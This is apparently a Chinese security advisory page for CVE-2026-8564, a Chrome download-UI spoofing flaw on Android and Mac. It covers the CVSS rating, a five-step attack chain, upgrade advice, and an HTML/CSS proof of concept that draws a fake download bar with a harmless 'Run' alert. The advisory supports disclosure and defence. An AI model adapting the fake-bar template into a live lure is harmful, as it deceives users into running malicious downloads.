CVE-2026-8564 CVSS 4.2 中危

CVE-2026-8564 Google Chrome下载UI欺骗漏洞

披露日期: 2026-05-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-8564

漏洞类型

UI欺骗

CVSS评分

4.2 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Google Chrome

漏洞概述

CVE-2026-8564是Google Chrome浏览器的一个中危漏洞。该漏洞影响Android和Mac平台上的Chrome版本（早于148.0.7778.168）。由于浏览器在处理下载文件时的安全用户界面（UI）设计存在缺陷，远程攻击者可以通过构建特制的HTML网页页面来利用此漏洞。成功利用后，攻击者能够实施UI欺骗攻击，诱导用户进行非预期的操作，从而可能造成低程度的机密性泄露或可用性影响。

技术细节

该漏洞的核心技术原理在于Google Chrome浏览器在渲染下载界面时，未能有效隔离恶意网页对安全UI的控制。攻击者可以通过精心构造的HTML代码，结合CSS样式或JavaScript脚本，覆盖或伪造浏览器的下载提示框。由于漏洞发生在下载流程的UI展示阶段，攻击者无需高权限即可发起攻击，但必须诱导用户进行交互（如点击下载）。利用方式通常涉及构建一个看似合法的下载按钮或提示，实则指向恶意资源或隐藏真实文件扩展名。虽然CVSS向量显示完整性和机密性影响有限，但此类UI欺骗攻击极易与社会工程学结合，绕过用户的心理防线，导致用户在不知情的情况下下载恶意软件，从而对系统造成进一步的安全威胁。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意HTML和CSS代码的特制网页，该网页能够伪造Chrome浏览器的下载界面。

STEP 2

步骤2

攻击者诱导受害者使用存在漏洞的Chrome版本（早于148.0.7778.168）访问该恶意网页。

STEP 3

步骤3

恶意网页在受害者浏览器中加载，并覆盖或伪造真实的下载安全提示UI（User Interface）。

STEP 4

步骤4

受害者误以为伪造的UI是浏览器原生的安全提示，点击了伪造的“保存”或“运行”按钮。

STEP 5

步骤5

攻击达成，受害者可能下载了恶意文件或执行了非预期的操作，导致信息泄露或系统受影响。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for UI Spoofing in Chrome Downloads -->
<!-- This HTML simulates a fake download bar -->
<!DOCTYPE html>
<html>
<head>
<style>
  /* Position the fake bar at the bottom to mimic Chrome UI */
  #fake-download-bar {
    position: fixed;
    bottom: 0;
    left: 0;
    width: 100%;
    height: 60px;
    background-color: #e8eaed;
    border-top: 1px solid #dadce0;
    display: flex;
    align-items: center;
    padding-left: 20px;
    font-family: Arial, sans-serif;
    box-shadow: 0 -2px 5px rgba(0,0,0,0.1);
    z-index: 9999;
  }
  .fake-icon {
    width: 32px;
    height: 32px;
    background: red; /* Represents a file type */
    margin-right: 15px;
  }
  .fake-text {
    flex-grow: 1;
  }
  .fake-link {
    color: #1a73e8;
    text-decoration: underline;
    cursor: pointer;
  }
</style>
</head>
<body>
  <h1>Regular Page Content</h1>
  <p>Wait for the download prompt...</p>

  <div id="fake-download-bar">
    <div class="fake-icon"></div>
    <div class="fake-text">
      <div>SafeFile.exe has been downloaded.</div>
      <div class="fake-link" onclick="alert('User clicked fake download link!')">Run</div>
      <span style="margin-left:10px; color:#5f6368;">&times;</span>
    </div>
  </div>
</body>
</html>

影响范围

Google Chrome on Android < 148.0.7778.168

Google Chrome on Mac < 148.0.7778.168

防御指南

临时缓解措施

建议用户立即将Google Chrome浏览器升级至148.0.7778.168或更高版本。在未修复前，应避免点击来源不明的下载链接或弹窗，并仔细核对浏览器地址栏中的域名与下载来源是否一致，警惕被伪造的下载界面误导。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表